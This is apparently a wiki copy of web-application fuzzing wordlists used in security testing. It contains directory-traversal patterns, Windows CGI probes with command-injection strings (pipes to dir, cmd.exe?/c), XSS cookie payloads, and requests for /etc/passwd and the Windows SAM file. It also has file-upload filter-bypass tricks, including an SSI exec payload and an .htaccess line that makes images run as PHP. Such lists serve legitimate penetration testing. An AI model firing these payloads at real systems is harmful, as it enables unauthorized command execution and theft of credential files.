././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
